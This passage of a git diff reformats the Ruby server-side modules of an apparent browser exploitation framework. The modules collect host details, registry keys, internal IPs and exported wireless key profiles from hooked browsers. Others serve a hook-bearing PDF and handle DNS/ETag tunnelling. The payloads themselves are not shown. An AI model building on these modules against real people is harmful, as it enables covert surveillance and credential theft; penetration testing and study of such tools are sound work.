@datastore['results']}) + save({ 'result' => @datastore['results'] }) end end diff --git a/modules/host/detect_cups/module.rb b/modules/host/detect_cups/module.rb index 1af073c7c..b862ddc29 100644 --- a/modules/host/detect_cups/module.rb +++ b/modules/host/detect_cups/module.rb @@ -5,31 +5,28 @@ # class Detect_cups < BeEF::Core::Command - def self.options - return [ - {'name' => 'ipHost', 'ui_label' => 'IP or Hostname', 'value' => '127.0.0.1'}, - {'name' => 'port' , 'ui_label' => 'Port', 'value' => '631'} - ] + [ + { 'name' => 'ipHost', 'ui_label' => 'IP or Hostname', 'value' => '127.0.0.1' }, + { 'name' => 'port', 'ui_label' => 'Port', 'value' => '631' } + ] end - + def post_execute - save({'CUPS' => @datastore['cups']}) + save({ 'CUPS' => @datastore['cups'] }) configuration = BeEF::Core::Configuration.instance - if configuration.get("beef.extension.network.enable") == true - if @datastore['results'] =~ /^proto=(https?)&ip=([\d\.]+)&port=([\d]+)&cups=Installed$/ - proto = $1 - ip = $2 - port = $3 - session_id = @datastore['beefhook'] - type = 'CUPS' - if BeEF::Filters.is_valid_ip?(ip) - print_debug("Hooked browser found 'CUPS' [proto: #{proto}, ip: #{ip}, port: #{port}]") - BeEF::Core::Models::NetworkService.create(:hooked_browser_id => session_id, :proto => proto, :ip => ip, :port => port, :type => type) - end - end + return unless configuration.get('beef.extension.network.enable') == true + return unless @datastore['results'] =~ /^proto=(https?)&ip=([\d.]+)&port=(\d+)&cups=Installed$/ + + proto = Regexp.last_match(1) + ip = Regexp.last_match(2) + port = Regexp.last_match(3) + session_id = @datastore['beefhook'] + type = 'CUPS' + if BeEF::Filters.is_valid_ip?(ip) + print_debug("Hooked browser found 'CUPS' [proto: #{proto}, ip: #{ip}, port: #{port}]") + BeEF::Core::Models::NetworkService.create(hooked_browser_id: session_id, proto: proto, ip: ip, port: port, type: type) end end - end diff --git a/modules/host/detect_default_browser/module.rb b/modules/host/detect_default_browser/module.rb index 09479e968..8dc6d414b 100644 --- a/modules/host/detect_default_browser/module.rb +++ b/modules/host/detect_default_browser/module.rb @@ -4,11 +4,9 @@ # See the file 'doc/COPYING' for copying permission # class Detect_default_browser < BeEF::Core::Command - - def post_execute - content = {} - content['browser'] = @datastore['browser'] if not @datastore['browser'].nil? - save content - end - + def post_execute + content = {} + content['browser'] = @datastore['browser'] unless @datastore['browser'].nil? + save content + end end diff --git a/modules/host/detect_google_desktop/module.rb b/modules/host/detect_google_desktop/module.rb index 9297d4d71..788dc3574 100644 --- a/modules/host/detect_google_desktop/module.rb +++ b/modules/host/detect_google_desktop/module.rb @@ -5,9 +5,7 @@ # class Detect_google_desktop < BeEF::Core::Command - def post_execute - save({'GoogleDesktop' => @datastore['google_desktop']}) + save({ 'GoogleDesktop' => @datastore['google_desktop'] }) end - end diff --git a/modules/host/detect_hp/module.rb b/modules/host/detect_hp/module.rb index 5e02becea..f441b1dfe 100644 --- a/modules/host/detect_hp/module.rb +++ b/modules/host/detect_hp/module.rb @@ -5,11 +5,9 @@ # ## class Detect_hp < BeEF::Core::Command - def post_execute content = {} - content['is_hp'] = @datastore['is_hp'] if not @datastore['is_hp'].nil? + content['is_hp'] = @datastore['is_hp'] unless @datastore['is_hp'].nil? save content end - end diff --git a/modules/host/detect_local_drives/module.rb b/modules/host/detect_local_drives/module.rb index b55f70408..963bf6f6e 100644 --- a/modules/host/detect_local_drives/module.rb +++ b/modules/host/detect_local_drives/module.rb @@ -7,7 +7,7 @@ class Detect_local_drives < BeEF::Core::Command def post_execute content = {} - content['result'] = @datastore['result'] if not @datastore['result'].nil? + content['result'] = @datastore['result'] unless @datastore['result'].nil? save content end end diff --git a/modules/host/detect_protocol_handlers/module.rb b/modules/host/detect_protocol_handlers/module.rb index b9043904d..db5e22cff 100644 --- a/modules/host/detect_protocol_handlers/module.rb +++ b/modules/host/detect_protocol_handlers/module.rb @@ -7,16 +7,16 @@ # ChromeHTML, code, Explorer.AssocProtocol.search-ms, FirefoxURL, gopher, icy, ie.http, ie.https, ie.ftp, iehistory, ierss, irc, itms, magnet, mapi, mms, mmst, mmsu, msbd, msdigitallocker, nntp, opera.protocol, outlook, pcast, rlogin, sc, search, search-ms, shout, skype, snews, steam, stssync, teamspeak, tel, telnet, tn3270, ts3file, ts3server, unsv, uvox, ventrilo, winamp, WindowsCalendar.UrlWebcal.1, WindowsMail.Url.Mailto, WindowsMail.Url.news, WindowsMail.Url.nntp, WindowsMail.Url.snews, WMP11.AssocProtocol.MMS, wpc class Detect_protocol_handlers < BeEF::Core::Command - def self.options - return [ - { 'ui_label'=>'Link Protocol(s)', 'name'=>'handler_protocol', 'description' => 'Comma separated list of protocol handlers', 'value'=>'http, https, ftp, file, mailto, news, feed, ldap', 'width'=>'200px' }, - { 'ui_label'=>'Link Address', 'name'=>'handler_addr', 'description' => 'Handler Address - usually an IP address or domain name. The user will see this.', 'value'=>'BeEF', 'width'=>'200px' }, + [ + { 'ui_label' => 'Link Protocol(s)', 'name' => 'handler_protocol', 'description' => 'Comma separated list of protocol handlers', + 'value' => 'http, https, ftp, file, mailto, news, feed, ldap', 'width' => '200px' }, + { 'ui_label' => 'Link Address', 'name' => 'handler_addr', 'description' => 'Handler Address - usually an IP address or domain name. The user will see this.', 'value' => 'BeEF', + 'width' => '200px' } ] end def post_execute - save({'handlers' => @datastore['handlers']}) + save({ 'handlers' => @datastore['handlers'] }) end - end diff --git a/modules/host/detect_software/module.rb b/modules/host/detect_software/module.rb index 65d8e31dd..654367bec 100644 --- a/modules/host/detect_software/module.rb +++ b/modules/host/detect_software/module.rb @@ -5,12 +5,10 @@ # class Detect_software < BeEF::Core::Command - def post_execute content = {} - content['installed_software'] = @datastore['installed_software'] if not @datastore['installed_software'].nil? - content['installed_patches'] = @datastore['installed_patches'] if not @datastore['installed_patches'].nil? + content['installed_software'] = @datastore['installed_software'] unless @datastore['installed_software'].nil? + content['installed_patches'] = @datastore['installed_patches'] unless @datastore['installed_patches'].nil? save content end - end diff --git a/modules/host/detect_users/module.rb b/modules/host/detect_users/module.rb index abc1eefff..81a6c3b84 100644 --- a/modules/host/detect_users/module.rb +++ b/modules/host/detect_users/module.rb @@ -7,7 +7,7 @@ class Detect_users < BeEF::Core::Command def post_execute content = {} - content['result'] = @datastore['result'] if not @datastore['result'].nil? + content['result'] = @datastore['result'] unless @datastore['result'].nil? save content end end diff --git a/modules/host/get_battery_status/module.rb b/modules/host/get_battery_status/module.rb index d860046c4..6334454d5 100644 --- a/modules/host/get_battery_status/module.rb +++ b/modules/host/get_battery_status/module.rb @@ -4,7 +4,6 @@ # See the file 'doc/COPYING' for copying permission # class Get_battery_status < BeEF::Core::Command - def post_execute content = {} content['chargingStatus'] = @datastore['chargingStatus'] @@ -13,5 +12,4 @@ class Get_battery_status < BeEF::Core::Command content['dischargingTime'] = @datastore['dischargingTime'] save content end - end diff --git a/modules/host/get_connection_type/module.rb b/modules/host/get_connection_type/module.rb index 7b37fb33b..c4fa5e9c3 100755 --- a/modules/host/get_connection_type/module.rb +++ b/modules/host/get_connection_type/module.rb @@ -4,11 +4,9 @@ # See the file 'doc/COPYING' for copying permission # class Get_connection_type < BeEF::Core::Command - def post_execute content = {} content['Result'] = @datastore['connection'] save content end - end diff --git a/modules/host/get_internal_ip_java/module.rb b/modules/host/get_internal_ip_java/module.rb index 91d0eb31f..0787be10b 100755 --- a/modules/host/get_internal_ip_java/module.rb +++ b/modules/host/get_internal_ip_java/module.rb @@ -4,16 +4,15 @@ # See the file 'doc/COPYING' for copying permission # class Get_internal_ip_java < BeEF::Core::Command - def pre_send BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/host/get_internal_ip_java/get_internal_ip.class', '/get_internal_ip', 'class') end - #def self.options + # def self.options # return [ # { 'name' => 'applet_name', 'description' => 'Applet Name', 'ui_label'=>'Number', 'value' =>'5551234','width' => '200px' }, # ] - #end + # end def post_execute content = {} @@ -22,20 +21,17 @@ class Get_internal_ip_java < BeEF::Core::Command BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/get_internal_ip.class') configuration = BeEF::Core::Configuration.instance - if configuration.get("beef.extension.network.enable") == true + return unless configuration.get('beef.extension.network.enable') == true - session_id = @datastore['beefhook'] + session_id = @datastore['beefhook'] - # save the network host - if @datastore['results'] =~ /^([\d\.]+)$/ - ip = $1 - if BeEF::Filters.is_valid_ip?(ip) - print_debug("Hooked browser has network interface #{ip}") - BeEF::Core::Models::NetworkHost.create(:hooked_browser_id => session_id, :ip => ip) - end - end + # save the network host + return unless @datastore['results'] =~ /^([\d.]+)$/ + + ip = Regexp.last_match(1) + if BeEF::Filters.is_valid_ip?(ip) + print_debug("Hooked browser has network interface #{ip}") + BeEF::Core::Models::NetworkHost.create(hooked_browser_id: session_id, ip: ip) end - end - end diff --git a/modules/host/get_internal_ip_webrtc/module.rb b/modules/host/get_internal_ip_webrtc/module.rb index ccd45dc28..baf1431ee 100755 --- a/modules/host/get_internal_ip_webrtc/module.rb +++ b/modules/host/get_internal_ip_webrtc/module.rb @@ -4,30 +4,29 @@ # See the file 'doc/COPYING' for copying permission # class Get_internal_ip_webrtc < BeEF::Core::Command - def post_execute content = {} content['Result'] = @datastore['result'] save content configuration = BeEF::Core::Configuration.instance - if configuration.get("beef.extension.network.enable") == true - session_id = @datastore['beefhook'] - # save the network host - if @datastore['results'] =~ /IP is ([\d\.,]+)/ - ips = $1.to_s.split(/,/) - if !ips.nil? && !ips.empty? - os = BeEF::Core::Models::BrowserDetails.get(session_id, 'host.os.name') - ips.uniq.each do |ip| - next unless ip =~ /^[\d\.]+$/ - next if ip =~ /^0\.0\.0\.0$/ - next unless BeEF::Filters.is_valid_ip?(ip) - print_debug("Hooked browser has network interface #{ip}") - BeEF::Core::Models::NetworkHost.create(:hooked_browser_id => session_id, :ip => ip, :os => os) - end - end + return unless configuration.get('beef.extension.network.enable') == true + + return unless @datastore['results'] =~ /IP is ([\d.,]+)/ + + # save the network host + ips = Regexp.last_match(1).to_s.split(/,/) + session_id = @datastore['beefhook'] + if !ips.nil? && !ips.empty? + os = BeEF::Core::Models::BrowserDetails.get(session_id, 'host.os.name') + ips.uniq.each do |ip| + next unless ip =~ /^[\d.]+$/ + next if ip =~ /^0\.0\.0\.0$/ + next unless BeEF::Filters.is_valid_ip?(ip) + + print_debug("Hooked browser has network interface #{ip}") + BeEF::Core::Models::NetworkHost.create(hooked_browser_id: session_id, ip: ip, os: os) end end end - end diff --git a/modules/host/get_registry_keys/module.rb b/modules/host/get_registry_keys/module.rb index 1baf92fb7..0cc0f1a74 100644 --- a/modules/host/get_registry_keys/module.rb +++ b/modules/host/get_registry_keys/module.rb @@ -4,10 +4,9 @@ # See the file 'doc/COPYING' for copying permission # class Get_registry_keys < BeEF::Core::Command - - def self.options - return [ - { 'name'=>'key_paths', 'ui_label' => 'Key(s)', 'description' => 'Enter registry keys. Note: each key requires its own line', 'type'=>'textarea', 'width' => '500px', 'height' => '350px', 'value'=>'HKLM\\SYSTEM\\CurrentControlSet\\Control\\SystemInformation\\SystemProductName + def self.options + [ + { 'name' => 'key_paths', 'ui_label' => 'Key(s)', 'description' => 'Enter registry keys. Note: each key requires its own line', 'type' => 'textarea', 'width' => '500px', 'height' => '350px', 'value' => 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\SystemInformation\\SystemProductName HKLM\\SYSTEM\\CurrentControlSet\\Control\\SystemInformation\\SystemManufacturer HKLM\\SYSTEM\\CurrentControlSet\\Control\\SystemInformation\\BIOSVersion HKLM\\SYSTEM\\CurrentControlSet\\Control\\SystemInformation\\BIOSReleaseDate @@ -17,17 +16,14 @@ HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\RegisteredOwner HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\RegisteredOrganization HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProductName HKLM\\HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0\\ProcessorNameString -HKLM\\HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0\\Identifier' -} - ] - end +HKLM\\HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0\\Identifier' } + ] + end - def post_execute - content = {} - content['result'] = @datastore['key_values'] if not @datastore['key_values'].nil? - content['fail'] = 'No data was returned.' if content.empty? - save content - end - + def post_execute + content = {} + content['result'] = @datastore['key_values'] unless @datastore['key_values'].nil? + content['fail'] = 'No data was returned.' if content.empty? + save content + end end - diff --git a/modules/host/get_system_info_java/module.rb b/modules/host/get_system_info_java/module.rb index d0695e0c6..1c23d5ed2 100644 --- a/modules/host/get_system_info_java/module.rb +++ b/modules/host/get_system_info_java/module.rb @@ -4,18 +4,15 @@ # See the file 'doc/COPYING' for copying permission # class Get_system_info_java < BeEF::Core::Command - - def pre_send - BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/host/get_system_info_java/getSystemInfo.class','/getSystemInfo','class') - end - - def post_execute - content = {} - content['result'] = @datastore['system_info'] if not @datastore['system_info'].nil? - content['fail'] = 'No data was returned.' if content.empty? - save content - BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/getSystemInfo.class') - end - -end + def pre_send + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/host/get_system_info_java/getSystemInfo.class', '/getSystemInfo', 'class') + end + def post_execute + content = {} + content['result'] = @datastore['system_info'] unless @datastore['system_info'].nil? + content['fail'] = 'No data was returned.' if content.empty? + save content + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/getSystemInfo.class') + end +end diff --git a/modules/host/get_wireless_keys/module.rb b/modules/host/get_wireless_keys/module.rb index a6e9c63da..6579c9d10 100644 --- a/modules/host/get_wireless_keys/module.rb +++ b/modules/host/get_wireless_keys/module.rb @@ -4,23 +4,20 @@ # See the file 'doc/COPYING' for copying permission # class Get_wireless_keys < BeEF::Core::Command - - def pre_send - BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/host/get_wireless_keys/wirelessZeroConfig.jar','/wirelessZeroConfig','jar') - end - - def post_execute - content = {} - content['result'] = @datastore['result'].to_s - save content - filename = "#{$home_dir}/exported_wlan_profiles_#{ip}_-_#{timestamp}_#{@datastore['cid']}.xml" - f = File.open(filename,"w+") - f.write((@datastore['results']).sub("result=","")) - writeToResults = Hash.new - writeToResults['data'] = "Please import #{filename} into your windows machine" - BeEF::Core::Models::Command.save_result(@datastore['beefhook'], @datastore['cid'] , @friendlyname, writeToResults, 0) - BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/wirelessZeroConfig.jar') - end - -end + def pre_send + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/host/get_wireless_keys/wirelessZeroConfig.jar', '/wirelessZeroConfig', 'jar') + end + def post_execute + content = {} + content['result'] = @datastore['result'].to_s + save content + filename = "#{$home_dir}/exported_wlan_profiles_#{ip}_-_#{timestamp}_#{@datastore['cid']}.xml" + f = File.open(filename, 'w+') + f.write((@datastore['results']).sub('result=', '')) + writeToResults = {} + writeToResults['data'] = "Please import #{filename} into your windows machine" + BeEF::Core::Models::Command.save_result(@datastore['beefhook'], @datastore['cid'], @friendlyname, writeToResults, 0) + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/wirelessZeroConfig.jar') + end +end diff --git a/modules/host/hook_default_browser/module.rb b/modules/host/hook_default_browser/module.rb index 71e244326..1d2e020da 100644 --- a/modules/host/hook_default_browser/module.rb +++ b/modules/host/hook_default_browser/module.rb @@ -5,55 +5,49 @@ # class Hook_default_browser < BeEF::Core::Command - def self.options configuration = BeEF::Core::Configuration.instance - proto = configuration.get("beef.http.https.enable") == true ? "https" : "http" - hook_uri = "#{proto}://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/report.html" - return [ - #{'name' => 'url', 'ui_label'=>'URL', 'type' => 'text', 'width' => '400px', 'value' => hook_uri }, + proto = configuration.get('beef.http.https.enable') == true ? 'https' : 'http' + hook_uri = "#{proto}://#{configuration.get('beef.http.host')}:#{configuration.get('beef.http.port')}/demos/report.html" + # @todo why is this commented out? + [ + # {'name' => 'url', 'ui_label'=>'URL', 'type' => 'text', 'width' => '400px', 'value' => hook_uri }, ] - end + end def pre_send + # Get the servers configurations. + configuration = BeEF::Core::Configuration.instance + proto = configuration.get('beef.http.https.enable') == true ? 'https' : 'http' - #Get the servers configurations. - configuration = BeEF::Core::Configuration.instance - proto = configuration.get("beef.http.https.enable") == true ? "https" : "http" - - #The hook url to be replace the token in the original pdf file. - hook_uri = "#{proto}://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/report.html" - - # A new pdf file containg the actual hook URI instead of the dummy token. - configured_hook_file = File.open("./modules/host/hook_default_browser/bounce_to_ie_configured.pdf","w") - - # The original pdf file contains a token that will get replaced during the initialization with - # the actual hook URI of beef. Note that the hook URI is accessed via the DNS name. - File.open('./modules/host/hook_default_browser/bounce_to_ie.pdf',"r") { |original_hook_file| - original_hook_file.each_line { |line| - # If the line includes the hook token, then replace it with the actual hook URI - if(line.include? '') - line = line.sub(//, hook_uri) - end - #write the line to a new file - configured_hook_file.write(line) - } - } - - configured_hook_file.close() - - - #Bind the configured PDF file to the web server. - BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/host/hook_default_browser/bounce_to_ie_configured.pdf', '/report', 'pdf', -1); - + # The hook url to be replace the token in the original pdf file. + hook_uri = "#{proto}://#{configuration.get('beef.http.host')}:#{configuration.get('beef.http.port')}/demos/report.html" + + # A new pdf file containg the actual hook URI instead of the dummy token. + configured_hook_file = File.open('./modules/host/hook_default_browser/bounce_to_ie_configured.pdf', 'w') + + # The original pdf file contains a token that will get replaced during the initialization with + # the actual hook URI of beef. Note that the hook URI is accessed via the DNS name. + File.open('./modules/host/hook_default_browser/bounce_to_ie.pdf', 'r') do |original_hook_file| + original_hook_file.each_line do |line| + # If the line includes the hook token, then replace it with the actual hook URI + line = line.sub(//, hook_uri) if line.include? '' + # write the line to a new file + configured_hook_file.write(line) + end + end + + configured_hook_file.close + + # Bind the configured PDF file to the web server. + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/host/hook_default_browser/bounce_to_ie_configured.pdf', '/report', 'pdf', -1) end def post_execute content = {} - content['result'] = @datastore['result'] - + content['result'] = @datastore['result'] + save content - #update_zombie! + # update_zombie! end - end diff --git a/modules/host/hook_microsoft_edge/module.rb b/modules/host/hook_microsoft_edge/module.rb index 132af9089..052b965b9 100644 --- a/modules/host/hook_microsoft_edge/module.rb +++ b/modules/host/hook_microsoft_edge/module.rb @@ -9,14 +9,14 @@ class Hook_microsoft_edge < BeEF::Core::Command configuration = BeEF::Core::Configuration.instance hook_uri = "#{configuration.beef_url_str}/demos/plain.html" - return [ - {'name' => 'url', 'ui_label'=>'URL', 'type' => 'text', 'width' => '400px', 'value' => hook_uri }, + [ + { 'name' => 'url', 'ui_label' => 'URL', 'type' => 'text', 'width' => '400px', 'value' => hook_uri } ] - end + end def post_execute content = {} - content['result'] = @datastore['result'] + content['result'] = @datastore['result'] save content end end diff --git a/modules/host/insecure_url_skype/module.rb b/modules/host/insecure_url_skype/module.rb index 1f08a15f2..0bc1560a9 100644 --- a/modules/host/insecure_url_skype/module.rb +++ b/modules/host/insecure_url_skype/module.rb @@ -4,22 +4,19 @@ # See the file 'doc/COPYING' for copying permission # class Insecure_url_skype < BeEF::Core::Command - def self.options - return [{ + [{ 'name' => 'tel_num', 'description' => 'The telephone number to dial', - 'ui_label'=>'Number', - 'value' =>'5551234', + 'ui_label' => 'Number', + 'value' => '5551234', 'width' => '200px' - }] + }] end def post_execute content = {} content['Result'] = @datastore['result'] save content - end - end diff --git a/modules/host/iphone_tel/module.rb b/modules/host/iphone_tel/module.rb index a56e16a41..c027bb0d0 100644 --- a/modules/host/iphone_tel/module.rb +++ b/modules/host/iphone_tel/module.rb @@ -4,10 +4,9 @@ # See the file 'doc/COPYING' for copying permission # class Iphone_tel < BeEF::Core::Command - def self.options - return [ - { 'name' => 'tel_num', 'description' => 'Telephone number', 'ui_label'=>'Number', 'value' =>'5551234','width' => '200px' }, + [ + { 'name' => 'tel_num', 'description' => 'Telephone number', 'ui_label' => 'Number', 'value' => '5551234', 'width' => '200px' } ] end @@ -15,7 +14,5 @@ class Iphone_tel < BeEF::Core::Command content = {} content['Result'] = @datastore['result'] save content - end - end diff --git a/modules/host/physical_location/module.rb b/modules/host/physical_location/module.rb index cfabf7071..b96a4e529 100644 --- a/modules/host/physical_location/module.rb +++ b/modules/host/physical_location/module.rb @@ -4,7 +4,6 @@ # See the file 'doc/COPYING' for copying permission # class Physical_location < BeEF::Core::Command - def post_execute content = {} content['Geolocation Enabled'] = @datastore['geoLocEnabled'] @@ -13,5 +12,4 @@ class Physical_location < BeEF::Core::Command content['OSM address'] = @datastore['osm'] save content end - end diff --git a/modules/host/physical_location_thirdparty/module.rb b/modules/host/physical_location_thirdparty/module.rb index 602ab3417..fea3fec79 100644 --- a/modules/host/physical_location_thirdparty/module.rb +++ b/modules/host/physical_location_thirdparty/module.rb @@ -5,13 +5,13 @@ # class Physical_location_thirdparty < BeEF::Core::Command def self.options - return [{ - 'name' => 'api_url', - 'type' => 'combobox', - 'ui_label' => 'API', - 'store_type' => 'arraystore', - 'store_fields' => ['api_url'], - 'store_data' => + [{ + 'name' => 'api_url', + 'type' => 'combobox', + 'ui_label' => 'API', + 'store_type' => 'arraystore', + 'store_fields' => ['api_url'], + 'store_data' => [ %w[http://ip-api.com/json], %w[https://ip.nf/me.json], @@ -22,16 +22,16 @@ class Physical_location_thirdparty < BeEF::Core::Command %w[http://www.geoplugin.net/json.gp], %w[https://ipinfo.io/json] ], - 'emptyText' => 'Select an API', - 'valueField' => 'api_url', - 'displayField' => 'api_url', - 'mode' => 'local', + 'emptyText' => 'Select an API', + 'valueField' => 'api_url', + 'displayField' => 'api_url', + 'mode' => 'local', 'forceSelection' => 'false', - 'autoWidth' => true + 'autoWidth' => true }] end def post_execute - save({'result' => @datastore['result']}) + save({ 'result' => @datastore['result'] }) end end diff --git a/modules/ipec/cross_site_faxing/module.rb b/modules/ipec/cross_site_faxing/module.rb index fe0eccdbc..68058e0bd 100644 --- a/modules/ipec/cross_site_faxing/module.rb +++ b/modules/ipec/cross_site_faxing/module.rb @@ -4,15 +4,15 @@ # See the file 'doc/COPYING' for copying permission # class Cross_site_faxing < BeEF::Core::Command - def self.options - return [ - {'name'=>'ip', 'ui_label' => 'Target Address', 'value' => 'localhost'}, - {'name'=>'port', 'ui_label' => 'Target Port', 'value' => '3000'}, - {'name'=>'recname', 'ui_label' => 'Name of the receiver', 'value' => 'BeEF'}, - {'name'=>'recfax', 'ui_label' => 'Fax number of the recipient', 'value' => '+1 11 112233-2'}, - {'name'=>'subject', 'ui_label' => 'Subject', 'value' => 'Got some BeEF?'}, - {'name'=>'msg', 'ui_label' => 'Message', 'description' => 'Message to print', 'type'=>'textarea', 'value'=>"********************************************************************** + [ + { 'name' => 'ip', 'ui_label' => 'Target Address', 'value' => 'localhost' }, + { 'name' => 'port', 'ui_label' => 'Target Port', 'value' => '3000' }, + { 'name' => 'recname', 'ui_label' => 'Name of the receiver', 'value' => 'BeEF' }, + { 'name' => 'recfax', 'ui_label' => 'Fax number of the recipient', 'value' => '+1 11 112233-2' }, + { 'name' => 'subject', 'ui_label' => 'Subject', 'value' => 'Got some BeEF?' }, + { 'name' => 'msg', 'ui_label' => 'Message', 'description' => 'Message to print', 'type' => 'textarea', 'value' => " +********************************************************************** .O, lkOl @@ -54,11 +54,12 @@ class Cross_site_faxing < BeEF::Core::Command .';o0WWWWWWWWWWWNk; .cxOKXKKOd;. -**********************************************************************", 'width'=>'200px' } - ] +**********************************************************************", + 'width' => '200px' } + ] end def post_execute - save({'result' => @datastore['result']}) + save({ 'result' => @datastore['result'] }) end end diff --git a/modules/ipec/cross_site_printing/module.rb b/modules/ipec/cross_site_printing/module.rb index f52e3f057..18618fab0 100644 --- a/modules/ipec/cross_site_printing/module.rb +++ b/modules/ipec/cross_site_printing/module.rb @@ -4,12 +4,11 @@ # See the file 'doc/COPYING' for copying permission # class Cross_site_printing < BeEF::Core::Command - def self.options - return [ - {'name'=>'ip', 'ui_label' => 'Target Address', 'value' => 'localhost'}, - {'name'=>'port', 'ui_label' => 'Target Port', 'value' => '9100'}, - {'name'=>'msg', 'ui_label' => 'Message', 'description' => 'Message to print', 'type'=>'textarea', 'value'=>"********************************************************************** + [ + { 'name' => 'ip', 'ui_label' => 'Target Address', 'value' => 'localhost' }, + { 'name' => 'port', 'ui_label' => 'Target Port', 'value' => '9100' }, + { 'name' => 'msg', 'ui_label' => 'Message', 'description' => 'Message to print', 'type' => 'textarea', 'value' => "********************************************************************** .O, lkOl @@ -51,17 +50,15 @@ class Cross_site_printing < BeEF::Core::Command .';o0WWWWWWWWWWWNk; .cxOKXKKOd;. -**********************************************************************", 'width'=>'200px' }, - ] +**********************************************************************", 'width' => '200px' } + ] end def post_execute content = {} - content['result'] = @datastore['result'] if not @datastore['result'].nil? - content['fail'] = @datastore['fail'] if not @datastore['fail'].nil? - if content.empty? - content['fail'] = 'No data was returned.' - end + content['result'] = @datastore['result'] unless @datastore['result'].nil? + content['fail'] = @datastore['fail'] unless @datastore['fail'].nil? + content['fail'] = 'No data was returned.' if content.empty? save content end end diff --git a/modules/ipec/dns_tunnel/module.rb b/modules/ipec/dns_tunnel/module.rb index 5778b0c27..4dfef56d2 100644 --- a/modules/ipec/dns_tunnel/module.rb +++ b/modules/ipec/dns_tunnel/module.rb @@ -4,22 +4,21 @@ # See the file 'doc/COPYING' for copying permission # class Dns_tunnel < BeEF::Core::Command - def self.options - @configuration = BeEF::Core::Configuration.instance - beef_host = @configuration.beef_host + @configuration = BeEF::Core::Configuration.instance + beef_host = @configuration.beef_host - return [ - {'name' => 'domain', 'ui_label'=>'Domain', 'type' => 'text', 'width' => '400px', 'value' => beef_host }, - {'name' => 'message', 'ui_label'=>'Message', 'type' => 'textarea', 'value' =>'Lorem ipsum dolor sit amet, consectetur adipiscing elit. Cras rutrum fermentum nunc, vel varius libero pharetra a. Duis rhoncus nisi volutpat elit suscipit auctor. In fringilla est eget tortor bibendum gravida. Pellentesque aliquet augue libero, at gravida arcu. Nunc et quam sapien, eu pulvinar erat. Quisque dignissim imperdiet neque, et interdum sem sagittis a. Maecenas non mi elit, a luctus neque. Nam pulvinar libero sit amet dui suscipit facilisis. Duis sed mauris elit. Aliquam cursus scelerisque diam a fringilla. Curabitur mollis nisi in ante hendrerit pellentesque ut ac orci. In congue nunc vitae enim pharetra eleifend.', 'width' => '400px', 'height' => '300px'}, -# {'name' => 'wait', 'ui_label' => 'Wait between requests (ms)', 'value' => '1000', 'width'=>'100px' } + [ + { 'name' => 'domain', 'ui_label' => 'Domain', 'type' => 'text', 'width' => '400px', 'value' => beef_host }, + { 'name' => 'message', 'ui_label' => 'Message', 'type' => 'textarea', + 'value' => 'Lorem ipsum dolor sit amet, consectetur adipiscing elit. Cras rutrum fermentum nunc, vel varius libero pharetra a. Duis rhoncus nisi volutpat elit suscipit auctor. In fringilla est eget tortor bibendum gravida. Pellentesque aliquet augue libero, at gravida arcu. Nunc et quam sapien, eu pulvinar erat. Quisque dignissim imperdiet neque, et interdum sem sagittis a. Maecenas non mi elit, a luctus neque. Nam pulvinar libero sit amet dui suscipit facilisis. Duis sed mauris elit. Aliquam cursus scelerisque diam a fringilla. Curabitur mollis nisi in ante hendrerit pellentesque ut ac orci. In congue nunc vitae enim pharetra eleifend.', 'width' => '400px', 'height' => '300px' } + # {'name' => 'wait', 'ui_label' => 'Wait between requests (ms)', 'value' => '1000', 'width'=>'100px' } ] end - + def post_execute content = {} content['dns_requests'] = @datastore['dns_requests'] save content end - end diff --git a/modules/ipec/etag_client/module.rb b/modules/ipec/etag_client/module.rb index bdb5fe78b..dba8e7b58 100644 --- a/modules/ipec/etag_client/module.rb +++ b/modules/ipec/etag_client/module.rb @@ -4,36 +4,34 @@ # See the file 'doc/COPYING' for copying permission # class Etag_client < BeEF::Core::Command - def self.options - return [ - {'name' => 'payload_name', 'ui_label'=>'Payload Name', 'type' => 'text', 'width' => '400px', 'value' => 'etagTunnelPayload'}, - {'name' => 'data', 'ui_label'=>'Message', 'type' => 'textarea', - 'value' => 'Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ' + - 'ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco ' + - 'laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in ' + - 'voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat '+ - 'non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.', - 'width' => '400px', 'height' => '100px' - }] - end + [ + { 'name' => 'payload_name', 'ui_label' => 'Payload Name', 'type' => 'text', 'width' => '400px', 'value' => 'etagTunnelPayload' }, + { 'name' => 'data', 'ui_label' => 'Message', 'type' => 'textarea', + 'value' => 'Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ' \ + 'ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco ' \ + 'laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in ' \ + 'voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat ' \ + 'non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.', + 'width' => '400px', 'height' => '100px' } + ] + end - def pre_send - # gets the value configured in the module configuration by the user - @configuration = BeEF::Core::Configuration.instance - enable = 